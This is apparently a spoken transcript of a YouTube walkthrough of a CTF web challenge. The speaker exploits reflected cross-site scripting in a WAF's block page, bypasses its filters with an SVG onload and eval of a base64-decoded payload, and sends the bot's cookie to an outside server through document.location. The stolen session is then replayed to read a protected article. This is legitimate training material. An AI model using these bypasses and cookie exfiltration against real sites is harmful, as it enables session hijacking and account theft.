 Hello everybody, welcome back to the YouTube video showcasing all Army Cyberstakes or ACI CTF that was going on this past week. I've been wanting to showcase some of these cool challenges. There were a ton of fantastic ones. I'm trying to get a lot of the tougher ones, at least some of the more complex ones that I had solved out of the way now before I burn out trying to record all this stuff. But this challenge is called I've Caught You Now. It's worth 250 points. Currently it's Friday, the competition ends on Sunday, so there might be a few more solves, but at the time of recording there are only 43 solves for this challenge. So it says XSS, or Cross-Site Scripting, is a thing of the past. We'd all about it here and we're given a link. So I will open that up in a web browser and it took a little bit to render that page, which is weird. But this is the Cyber Times web page. It says there are five cool ways to protect your websites from hackers. This looks kind of like a blog here. Featured posts, you will never believe this flag we found. It says when going head first in CTF, everyone wants to find blah, blah, blah flags and help us out. So make cool content to us. Okay, so if I were to click on one of these, I'll go to article zero here. It says to fight back these companies deploy applications called a web application and then ellipsis. It says you're out of free articles. Please use an account with a cyber time subscription to read this article. So if I try to click on any of these links here, search for security or hacking or exploit cyber crime firewall CTF, it looks like they're all modifying this search URL here. The search is the location that it's trying to go to with a argument or an HTTP variable get that's passed in search and what we're actually looking for. So going back to the page, though, this featured post here, article one, as the link says you'll never believe this flag we found we figured out one challenge you won't believe the flag we got find out below. Okay, so that must be maybe where a flag could be hidden. But we do not have access to read that page. There is a submit cool content to us location send us links to cool content. We'll see if it is newsworthy. Like you I suppose we could give them a URL. So based off of everything that we've learned looks like there are web pages, there are blogs on the site. There's a location that we could submit a URL to visit. And we aren't able to access some of the page, some of the pages and some of the content on this website. Given the challenge description, I'm assuming this is going to be a cross site scripting attack where we need to be able to drive whoever validates or whoever checks in that submission page to review and access some of these pages that we cannot access. So where could we control or where do we have an input that we could modify and make it do something sounds like we could at least kind of offer some input into the search blog functionality. And the page is moving slowly for me. So why is that I'll pause and see if it comes back. Okay, now it seems to be stable. But if I were to search for thing like the letter a, or please subscribe, it looks like it renders it out on the page. So maybe we could do some things to actually get some cross site scripting in there render some HTML. Okay, that h one doesn't seem to load for me. So that kind of takes away some of the wind that we had. But what else could we do h one anything that's so weird that it does that we could search for like an image tag maybe if we do image source equals nothing. Oh, okay, it says this page has been blocked by secure WAF. And this is still on the web page. This isn't this isn't our browser trying to tell us something. It says secure WAF detected that the URL parameter search contains dangerous data. So this web request has been blocked for your protection. Okay, so that must have triggered with the image source thing. Is it just the image tag that makes it wine? Yeah, yeah, so slash image slash I am. Is that going to load for me? Okay, so I am works. It's just searching for IMG with an opening arrow. And it'll wine for me secure WAF detect URL parameter search contains dangerous data. It's weird though, because it includes the URL parameter itself in its response. So if I did something strange with a URL parameter, does it have to be search that has the weirdness or could it be? Could I could I also include something in here like image source equals maybe could I could I do that or just I'll just use the image tag itself. That seems to break it. Okay. Could I use that h one tag that I just tried earlier h one. Hello, encode part of the URL. Oh, okay. Oh, I ended code saying that allowed my bad h one as the encode that seems to do its own injection, which is kind of peculiar. Well, let's start to script this let's start to hammer this in a way that we could work with it and kind of be able to monitor and see everything that's happening. What is the name of this challenge again? I've caught you now so make directory I have caught you now. Let's hop over in there and let's start to script this with Python. I have all of the other tabs open from some previous videos I've been recording I'm trying to get a lot of these out for you guys. So let's import requests. Let's get this URL. Let's say URL equals just the base URL. I don't need searching here. So let's get a requests.get URL, I'll say r to equal that. I'll print out our r dot text. And now let's try and run that page. Okay, so we'll now return out for us to make things a little bit easier to see and work with. I'm going to use shift alt to to get a second tab or pane within sublime text. And then when I run this, I have build view as a plugin set up, you could install package build view, control shift P to access that. And I will go ahead and mark this page as HTML. So it's a little bit easier to read for us. So so let's try and trigger that bad page again, let's say our parameters can equal a dictionary with something or h one, anything that we just tried earlier set to image. So this is funky so this is funky because the parameter name itself is where we can get our cross site scripting kind of injection in. But the value is what it's being used to trigger that WAF or that web application firewall to actually have this the web application firewall is actually made it insecure in itself, because it is vulnerable to cross site scripting. So the value of this HTTP variable, this get variable, that's what's going to trigger the page. But then using this parameter name itself, we can inject that into the page. So I'll specify params equals parameters. We should just call that variable params. So it's makes more sense, I guess. So let's spit that out. It says, Okay, this page has been blocked by secure WAF secure out detected URL parameter code, h one, anything being properly rendered. So we could we know that because there aren't any like ampersand LT or LT GT some no HTML escaped sequences are in there. That contains dangerous data. So this request has been blocked for your protection. Okay, so it looks like our XSS payload, let's make a variable for that our XSS payload could be let's use a long string in Python. I wonder if that'll let us do some things. So h one, anything h one, anything. And what I actually want to do is I want to print out the URL of this page, so I can interact with it more. So r dot URL, or I can see in my browser how this actually loads. So we'll copy that in, slap it in. And okay, it looks like that renders it just fine. This is currently trapped inside of a code block. So let me try and end that code block. And then it tries to have another one. So I'll so it tries to close its original code block. So I guess I'll add a new one in there just so the page doesn't do weird things. Now let's try to do some of our image source equals nonsense. I can use double quotes because we're inside of these triple quotes and Python. So if I have that and I do a little on error equals Java script, alert one plus one. So we know that it evaluates that gets the forbidden. Okay, so it seems sensitive on this image tag. I didn't try just a straight script. So we could try that script and end script. Alert. One plus two doesn't matter also gets a forbidden. Okay. But our H one went through. That's weird. What can we get through? Hmm. Let's let's go to payload all the things. Let's go check out some of their options and ideas for cross site scripting or XSS injection. Looks like they have a few options. So typically, a classic cross site scripting technique would grab a cookie document dot cookie from really the end user. Maybe we could get that to work eventually. But we can't seem to use these script tags. What else could we do? Can't use script can't use script. Oh, the internal one maybe it's replacing it. No, that's weird. So image also has it wine. Does SVG on load let it work? SVG on. Can we try an SVG payload? Let's try one of those spit that in pages taking a little bit of time to come back. Oh, okay, there he goes. Code SVG on load alert XSS. What did it do to my quotes? How come my single quotes aren't in there? Does this actually happen on the web page? Oh, no, it does not. It does not run that alert. But it does a weird thing getting an SVG in there. Okay, if I use the one plus two, does that actually trigger it? That does. Okay. So we have JavaScript somehow some way. But we can't seem to use quotes. The single quote didn't work. Will it double quote work? No. That is also being scraped out. Okay. What else are what are our options? What can we do to get a string? XSS or JavaScript string without quotes, I feel like that's just shot in the dark. But can you create a JavaScript string without single quotes or double quotes? Blah, blah, blah. I've had to create strings without quotes or product as well. We're delivering executable things. So they use string, and they use forward slashes to get string. Does that work? Or we could do it just from the numbers. Let's try let's try both of those. Let's use string. This guy here. This contains no quotes. Let's try that. Copy that guy in this contains no quotes. Oh, but it also removed our spaces. What the heck? So the string showed up. We don't have spaces. That's going to be annoying. Could we we could use we could get spaces in there if we were to use that from character code syntax. Let's try him. Paste that in as our little alert payload. Run that. Copy him. Put that on that page. That also doesn't work. Why not alert string. Oh, it removes the periods. Oh my gosh. How are we going to be able to do a document location if we don't have periods or the dots we can actually use? Dang. Okay, well, we at least learned a little bit of something we could use strings. If we use these forward slashes, this is cover anything else. No, that's all that's in that page. I want to remove double quotes from string that doesn't work. Oh, they use that here and payload all the things alert with back ticks. Does that work? Can we use back ticks as a string? Hmm. Well, maybe we could still well, can we use those? How could we how could we escape this whole syntax without using periods and spaces? Alert. Eval. Eval might let us do some stuff. Oh, oh, oh, oh, oh, oh, and we could probably like base 64 in code JavaScript. So I always forget this function. If you go into the console and you were to try and run like ATOB, what is ATOB and BTOA? Those can get something into and out of base 64. So please sub okay, BTOA is to get it into base 64. And ATOB is to decode from base 64. Yeah. Okay, so let's try to get our let's try to get another actual payload. So let's say Stager can actually equal this and let's get a real payload that can be another multi line string. And let's do alert. Hello. This is me or whatever. It doesn't matter. As long as we have something with spaces and quotes. We could eval the ATOB. That's the one that we just that's the one that we just determined was right. That BTOA. Yeah, so ATOB is what we need. And then if we use the forward slashes, will that work? Will forward slashes work? Let's go ahead and base 64 encode import base 64, our payload B64 encode that payload. And let's set the payload to equal that. So now it is base 64 encoded. And let me I think I'm in Python two again, because the stupid subline text, we'll just split that in with the percent sign. Does that work? Oh, the page took it. Spit that in. No, unexpected token. That thing. Do I have too many? Oh, no, because the do I have too many parentheses unexpected token closing parentheses? Could I use the back ticks that I saw as a technique? Oh, that worked. Okay. Oh, so that that would essentially give us like everything that we need. Because now we're not working out of the like original filter. So we could use spaces, we could use quotes, we could probably even use periods. So now we have unfiltered JavaScript, and we could perform a real cross site scripting attack. Okay, that is progress. So what do we need to do? Well, let's try and get someone's cookie. Let's do let's let's spin up a little server that could be accessible from the internet. So a public box. And let's just make a directory for XSS random name doesn't matter Python tack m specify Python three quad eight. So that guy should exist. He does great. I see my request. Let's spin him one more time. And let's try and modify our script to go to document dot location. HTTP, john Hammond org, quad eight as the port and let's include a document dot cookie. Does that work for us? Does he have a cookie? If I run this, I'll see myself go if I try and go to this location. Let me try that. I'll spin this up. I'll close out of this debugger here. Let's paste that in. Okay, so that carried me over error response file not found whatever it doesn't need a file but it got all of the cookies that I had. So my PHP session is in there. If I were to go submit that okay stop I don't I don't need that anymore. Bring me back to the original server please. Yeah, fine. Spin that one more time. And let's make sure you guys can see that without my face being in the way. Go ahead and submit that URL to the validator or whoever's going to check that. Thanks. We'll check it out in a few minutes. Please give us some time before trying again. Okay, let's see if we ever get a request from him. We do we do we get a session. Oh, perfect. Okay. And that must be the cookie. So I'm going to use my edit this cookie manager. Let's search cookies for here. Can I add a new one? Can I add a new cookie please? Whatever. Let's not do it in the browser. Let's just let's just use our Python or Python sword, the magic that we know within Python. So now let's let's just call this like catch cookie dot pie. And let's totally save a different one to be like get flag dot pie. So we know that the session value looks like this because we just caught that with our JavaScript cross site scripting cookie catcher. So what we could do is use requests. Holy crap to get this URL. Let's say my cookies equals session set to that with a key and value pair. Let's say cookies equals cookies. And let's just load the page print it out r dot text Holy cow. And okay, it reads it just fine. So can I get to that article one page? That's the one that says it has a flag in it. So let's get URL plus article one and spit that guy out. Oh yeah. Okay, awesome. Awesome. When going head first in CTFs, everyone wants to come out with some cool flag. After a truckload of effort, we were rewarded with the text ACI. So there's our flag. That's it. That's what we did. That's how we solve it. That's fantastic. So that was kind of cool. I hope you guys really like that challenge. The little catch cookie, you need to do some clever cross site scripting stuff. If you had tinkered around with this for more, I actually did I spent a lot of time I think I spent like a couple hours on this one. SVG I didn't end up using originally I actually did a body on load. And I would use a new line to get my spaces in there. And I actually I was even like changing the whole URL or the CSS in that page. I'd be like I verify what can I actually read in can I make the background read? How many characters can I use and I would slowly figure out, okay, these are the filters that are that are beating me up, and how I needed to get around them. So that eval base 64 technique is really what I use to get out of the filter and be able to use strings periods up like double quotes and single quotes, whatever I really needed to. And I stage it all with Python and just grab the URL so I could kind of go back and forth between troubleshooting how it looks on the page and have it's going to actually render that JavaScript in my browser. So that's that. That was that challenge. But boy, I hope that was cool. I hope you guys learned a little bit of some tricks in there for cross site scripting. You could also do a little XML like HTTP request or xhr. That's even the solution that I had. I'll go find and show you my script. I don't know why I'm still talking about this like I'm not going to show you. What is the name of this challenge? Why do I forget every single time I've caught you now? That's what it is. Ape.py. Yeah, I actually used xhr to go ahead and grab the article and then send it to myself. I will use document location after but getting the cookie will work just as well because you're going to act as that user. So you can you can see the style sheets that I was saying I did crazy stuff with. That's it. But some people might have had the Iran into the issue where you're getting a cores error or a cross origin policy or like you have to be remaining on the website itself, you can't request out to an external site with xhr. That's correct. So when we were doing document location document location will not have that cores problem. But if you were to use xhr or a new XML HTTP request to reach out to your external server where you're going to grab the flag from, well, then it's going to say hey, you're not allowed to leave the site or cross origin policies just not letting it have that. So don't use do use document location, you got to use document location to go ahead and grab that cookie or grab the text that you really want to end up seeing. So that's that XML HTTP response is kind of cool or request because you can do a lot of drive by downloading and access any other page that you want. But if you are catching something externally, you have to use document location or you're sending something externally, you'd have to use that in this case. At least that's what I've seen. I'm happy to hear if you guys got anything else. But that was that challenge. Wow. Wow. Thank you guys so much for watching. I hope you guys enjoyed this video. I hope you learned something cool, some neat tricks with cross site scripting, a lot of good resources out there between payload all the things and just some quick googling and researching just trying to do clever tricks and techniques. So if you like this video, please do hit that like button. If you didn't like it, hit the dislike button twice so I know how much you hated it. Leave a comment, type some things in the box and hit and the enter key YouTube algorithm stuff. Please don't hesitate to subscribe, hit that bell icon. I don't know why you would ever hit a bell personally. What did it do to you? But hey, I hate doing it. I'm so bad at outros. Just get off the video. See you on LinkedIn, Twitter, Facebook, Discord, Patreon, etc.